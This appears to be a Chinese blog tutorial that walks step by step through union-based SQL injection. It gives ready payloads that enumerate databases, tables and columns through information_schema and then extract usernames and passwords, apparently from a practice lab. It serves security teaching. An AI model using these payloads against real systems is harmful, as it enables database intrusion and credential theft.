15分钟了解sql注入(一) union注入
🏆今日学习目标:
🍀学会阶乘之和题目
✅创作者:贤鱼
🎉个人主页:贤鱼的个人主页
🔥专栏系列:网络安全
SQL注入
- union注入
- 原理
- 过程
- 判断数字或者字符串
- 判断字段数
- 判断回显点
- 注入库名
- 注入表名
- 注入列名
- 查数据
union注入
原理
利用union关键字,union会将前后两次查询结果拼在一起,由于是联合查询,必须保证字段数一致,也就是两个查询结果有相同列数
过程
1 判断数字或者字符串注入类型
2 判断字段数,查询有几个字段
3 判断回显点,有些字段存在但是不会输出内容,我们需要找到会显示的字段数
4 注入库名
5 注入表名
6 注入列名
7 查数据
判断数字或者字符串
输入:
id=1
id=1’
id=1’–+(–+是注释的意思)
为什么加个单引号会报错,而加个注释又会查询成功呢?
举个栗子:‘xxx xxx xxx’这样子是正常的
‘xxx xxx id’ xxx’ 这样子第二个’是不是就会报错
‘xxx xxx id’–+xxx’这样子后面的‘就被注释掉了,也就不会报错了
判断字段数
上文说过,union前后查询字段数必须一致,所以我们还要对字段数进行判断。在此可以利用order by n进行判断,意思是根据n个字段排序,如果不存在这个字段就会报错
这里依次查询1,2,3,4,5
4和5都会报错,所以可以得知,字段数为3
当然 union也是可以用的
第一个是1查询的,后面三个是1,2,3查询的,1,2,3,4依旧报错
判断回显点
这里的操作和上文union查询字段数一样
很明显,字段数3中,我们的1,2,3都输出了,所以回显点就是1,2,3
注入库名
查询到回显点,就要开始注入了,想要注入数据,必须得到他的库名
获得库名可以用database()函数
如图:输入id=-1’ union select 1,2,3 --+
我们再回显点2位置注入,发现成功获得了库名
当然,换个位置效果一样
分享几个查询数据库的方法
id=-1' union select 1,database(),3 --+
查看所有数据库名称
id=-1' union select 1,SCHEMA_name,3 from information_schema.schemata --+
id=-1' union select 1,SCHEMA_name,3 from information_schema.schemata limit1,1 --+ # 查询第2个数据
也可以用group_concat()函数将查询结果内容放入同一行
id=-1' union select 1,group_concat(SCHEMA_name),3 from information_schema.schemata --+
注入表名
有了库名就可以查询表名了
id=-1' union select 1,group_concat(table_name),3 from information_schema.tables
where table_schema='库名' --+
就可以查询到表名了
注入列名
查询到库名和表名就可以查询列名
d=-1' union select 1,group_concat(column_name),group_concat(data_type) from
information_schema.columns where table_schema='库名' and table_name='表名' --+
查数据
接下来就是查询数据了
id=-1' union select 1,username,password from security.users limit 0,1 --+
id=-1' union select 1,concat(username,0x5c,password),3 from security.users limit 0,1 --+
id=-1' union select 1,group_concat(username,0x5c,password),3 from security.users
--+
concat() :将两个字段结合成为一个字段
🏆结束语union注入的大致流程就是这样了,有需要的话订阅一下专栏吧,持续更新的
